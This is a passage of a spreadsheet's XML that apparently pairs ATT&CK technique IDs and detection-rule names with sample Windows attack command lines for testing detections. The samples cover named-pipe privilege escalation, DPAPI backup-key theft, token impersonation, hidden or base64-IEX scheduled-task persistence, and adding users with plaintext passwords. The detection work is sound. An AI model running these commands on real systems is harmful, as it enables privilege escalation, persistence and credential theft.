        <is>
          <t>C:\windows\system32\cmd.exe /C echo Uuup! &gt; \\.\pipe\HighPriv</t>
        </is>
      </c>
      <c r="F324" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G324" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H324" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I324" s="43" t="n"/>
      <c r="J324" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K324" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="325" ht="15.75" customHeight="1" s="42">
      <c r="A325" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B325" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_meterpreter_getsystem</t>
        </is>
      </c>
      <c r="C325" s="43" t="inlineStr">
        <is>
          <t>Potential Meterpreter/CobaltStrike Activity</t>
        </is>
      </c>
      <c r="D325" s="43" t="inlineStr">
        <is>
          <t>15619216-e993-4721-b590-4c520615a67d</t>
        </is>
      </c>
      <c r="E325" s="43" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\cmd.exe /C start C:\WINDOWS\system32\cmd.exe /C "timeout /t 3 &gt;nul&amp;&amp;echo TestSVC &gt; \\.\pipe\TestSVC"</t>
        </is>
      </c>
      <c r="F325" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G325" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H325" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I325" s="43" t="n"/>
      <c r="J325" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K325" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="326" ht="15.75" customHeight="1" s="42">
      <c r="A326" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B326" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_meterpreter_getsystem</t>
        </is>
      </c>
      <c r="C326" s="43" t="inlineStr">
        <is>
          <t>Potential Meterpreter/CobaltStrike Activity</t>
        </is>
      </c>
      <c r="D326" s="43" t="inlineStr">
        <is>
          <t>15619216-e993-4721-b590-4c520615a67d</t>
        </is>
      </c>
      <c r="E326" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe payload.dll, a /p:tmexsn</t>
        </is>
      </c>
      <c r="F326" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G326" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H326" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I326" s="43" t="n"/>
      <c r="J326" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K326" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="327" ht="15.75" customHeight="1" s="42">
      <c r="A327" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B327" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_meterpreter_getsystem</t>
        </is>
      </c>
      <c r="C327" s="43" t="inlineStr">
        <is>
          <t>Potential Meterpreter/CobaltStrike Activity</t>
        </is>
      </c>
      <c r="D327" s="43" t="inlineStr">
        <is>
          <t>15619216-e993-4721-b590-4c520615a67d</t>
        </is>
      </c>
      <c r="E327" s="43" t="inlineStr">
        <is>
          <t>C:\windows\system32\cmd.exe /C "echo Uuup! &gt; \\.\pipe\HighPriv"</t>
        </is>
      </c>
      <c r="F327" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G327" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H327" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I327" s="43" t="n"/>
      <c r="J327" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K327" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="328" ht="15.75" customHeight="1" s="42">
      <c r="A328" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B328" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C328" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D328" s="43" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E328" s="43" t="inlineStr">
        <is>
          <t>SharpDPAPI.exe backupkey /machine</t>
        </is>
      </c>
      <c r="F328" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G328" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H328" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I328" s="43" t="n"/>
      <c r="J328" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K328" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="329" ht="15.75" customHeight="1" s="42">
      <c r="A329" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B329" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C329" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D329" s="43" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E329" s="43" t="inlineStr">
        <is>
          <t>SharpDPAPI.exe "backupkey" /machine</t>
        </is>
      </c>
      <c r="F329" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G329" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H329" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I329" s="43" t="n"/>
      <c r="J329" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K329" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="330" ht="15.75" customHeight="1" s="42">
      <c r="A330" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B330" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C330" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D330" s="43" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
      <c r="E330" s="43" t="inlineStr">
        <is>
          <t>sysupdate.exe "user:Administrator" "binary:cmd.exe"</t>
        </is>
      </c>
      <c r="F330" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G330" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H330" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I330" s="43" t="n"/>
      <c r="J330" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K330" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="331" ht="15.75" customHeight="1" s="42">
      <c r="A331" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B331" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C331" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D331" s="43" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
      <c r="E331" s="43" t="inlineStr">
        <is>
          <t>updater.exe --user Administrator --binary calc.exe</t>
        </is>
      </c>
      <c r="F331" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G331" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H331" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I331" s="43" t="n"/>
      <c r="J331" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K331" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="332" ht="15.75" customHeight="1" s="42">
      <c r="A332" s="43" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B332" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C332" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D332" s="43" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
      <c r="E332" s="43" t="inlineStr">
        <is>
          <t>updater.exe technique:CreateProcessWithTokenW binary:cmd.exe pid:1337</t>
        </is>
      </c>
      <c r="F332" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G332" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H332" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I332" s="43" t="n"/>
      <c r="J332" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K332" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="333" ht="15.75" customHeight="1" s="42">
      <c r="A333" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B333" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C333" s="43" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D333" s="43" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E333" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "calc.exe" /SC WEEKLY /D MON /ST 08:00</t>
        </is>
      </c>
      <c r="F333" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G333" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H333" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I333" s="43" t="n"/>
      <c r="J333" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K333" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="334" ht="15.75" customHeight="1" s="42">
      <c r="A334" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B334" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C334" s="43" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D334" s="43" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E334" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /TR "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command \"Write-Host 'Test'\"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F334" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G334" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H334" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I334" s="43" t="n"/>
      <c r="J334" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K334" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="335" ht="15.75" customHeight="1" s="42">
      <c r="A335" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B335" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C335" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D335" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E335" s="43" t="inlineStr">
        <is>
          <t>schtasks  /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST 20:10</t>
        </is>
      </c>
      <c r="F335" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G335" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H335" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I335" s="43" t="n"/>
      <c r="J335" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K335" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="336" ht="15.75" customHeight="1" s="42">
      <c r="A336" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B336" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C336" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D336" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E336" s="43" t="inlineStr">
        <is>
          <t>schtasks  /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10</t>
        </is>
      </c>
      <c r="F336" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G336" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H336" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I336" s="43" t="n"/>
      <c r="J336" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K336" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="337" ht="15.75" customHeight="1" s="42">
      <c r="A337" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B337" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C337" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D337" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E337" s="43" t="inlineStr">
        <is>
          <t>schtasks  /Create /TN "CompMgmtBypass" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F337" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G337" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H337" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I337" s="43" t="n"/>
      <c r="J337" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K337" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="338" ht="15.75" customHeight="1" s="42">
      <c r="A338" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B338" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C338" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D338" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E338" s="43" t="inlineStr">
        <is>
          <t>schtasks  /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F338" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G338" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H338" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I338" s="43" t="n"/>
      <c r="J338" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K338" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="339" ht="15.75" customHeight="1" s="42">
      <c r="A339" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B339" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C339" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D339" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E339" s="43" t="inlineStr">
        <is>
          <t>schtasks  /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F339" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G339" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H339" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I339" s="43" t="n"/>
      <c r="J339" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K339" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="340" ht="15.75" customHeight="1" s="42">
      <c r="A340" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B340" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C340" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D340" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E340" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe  /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\ATOMIC-T1053.005).test)))" /sc daily /st 07:45</t>
        </is>
      </c>
      <c r="F340" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G340" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H340" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I340" s="43" t="n"/>
      <c r="J340" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K340" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="341" ht="15.75" customHeight="1" s="42">
      <c r="A341" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B341" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C341" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D341" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E341" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "test" /tr "cmd.exe" /f</t>
        </is>
      </c>
      <c r="F341" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G341" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H341" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I341" s="43" t="n"/>
      <c r="J341" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K341" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="342" ht="15.75" customHeight="1" s="42">
      <c r="A342" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B342" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C342" s="43" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D342" s="43" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E342" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /ST 00:00 /TN "UpdateTask" /TR update.exe /F</t>
        </is>
      </c>
      <c r="F342" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G342" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H342" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I342" s="43" t="n"/>
      <c r="J342" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K342" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="343" ht="15.75" customHeight="1" s="42">
      <c r="A343" s="43" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B343" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C343" s="43" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D343" s="43" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E343" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set P1=UWhRCA &amp;&amp; set P2=BAAAA &amp;&amp; echo Simulated payload execution using %P1% %P2%"</t>
        </is>
      </c>
      <c r="F343" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G343" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H343" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I343" s="43" t="n"/>
      <c r="J343" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K343" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="344" ht="15.75" customHeight="1" s="42">
      <c r="A344" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B344" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C344" s="43" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D344" s="43" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E344" s="43" t="inlineStr">
        <is>
          <t>"net.exe" user DOMAIN\\user password123 /add</t>
        </is>
      </c>
      <c r="F344" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G344" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H344" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I344" s="43" t="n"/>
      <c r="J344" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K344" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="345" ht="15.75" customHeight="1" s="42">
      <c r="A345" s="43" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B345" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C345" s="43" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D345" s="43" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E345" s="43" t="inlineStr">
        <is>
          <t>"net.exe" user DOMAIN\\user password123 /ADD</t>
        </is>
      </c>
      <c r="F345" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G345" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H345" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I345" s="43" t="n"/>
      <c r="J345" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K345" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="346" ht="15.75" customHeight="1" s="42">
      <c r="A346" s="43" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B346" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C346" s="43" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D346" s="43" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E346" s="43" t="inlineStr">
        <is>
          <t>copy SharpSuccessor.exe not_malicious.exe &amp;&amp; not_malicious.exe add /impersonate:Administrator /path:C:\Windows\System32 /account:TestUser /name:DnsAdmin</t>
        </is>
      </c>
      <c r="F346" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G346" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H346" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I346" s="43" t="n"/>
      <c r="J346" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K346" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="347" ht="15.75" customHeight="1" s="42">
      <c r="A347" s="43" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B347" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C347" s="43" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D347" s="43" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E347" s="43" t="inlineStr">
        <is>
          <t>copy SharpSuccessor.exe not_malicious.exe &amp;&amp; not_malicious.exe /add /imp:Administrator /path:C:\Windows\System32 /acc:TestUser /n:DnsAdmin</t>
        </is>
      </c>
      <c r="F347" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G347" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H347" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I347" s="43" t="n"/>
      <c r="J347" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K347" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="348" ht="15.75" customHeight="1" s="42">
      <c r="A348" s="43" t="inlineStr">
        <is>
          <t>t1068</t>
        </is>
      </c>
      <c r="B348" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpsuccessor_execution</t>
        </is>
      </c>
      <c r="C348" s="43" t="inlineStr">
        <is>
          <t>HKTL - SharpSuccessor Privilege Escalation Tool Execution</t>
        </is>
      </c>
      <c r="D348" s="43" t="inlineStr">
        <is>
          <t>38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8</t>
        </is>
      </c>
      <c r="E348" s="43" t="inlineStr">
        <is>
          <t>copy SharpSuccessor.exe not_malicious.exe &amp;&amp; not_malicious.exe /add /impersonate:Administrator /path:C:\Windows\System32 /account:TestUser /name:DnsAdmin</t>
        </is>
      </c>
      <c r="F348" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G348" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H348" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I348" s="43" t="n"/>
      <c r="J348" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K348" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="349" ht="15.75" customHeight="1" s="42">
      <c r="A349" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B349" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C349" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D349" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E349" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ("Win" + "Pwn.ps1") -noninteractive"</t>
        </is>
      </c>
      <c r="F349" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G349" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H349" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I349" s="43" t="n"/>
      <c r="J349" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K349" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="350" ht="15.75" customHeight="1" s="42">
      <c r="A350" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B350" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C350" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D350" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E350" s="43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F350" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G350" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H350" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I350" s="43" t="n"/>
      <c r="J350" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K350" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="351" ht="15.75" customHeight="1" s="42">
      <c r="A351" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B351" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C351" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D351" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E351" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; (Resolve-Path (".\Win" + "Pwn.ps1")) -noninteractive"</t>
        </is>
      </c>
      <c r="F351" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G351" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H351" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I351" s="43" t="n"/>
      <c r="J351" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K351" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="352" ht="15.75" customHeight="1" s="42">
      <c r="A352" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B352" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
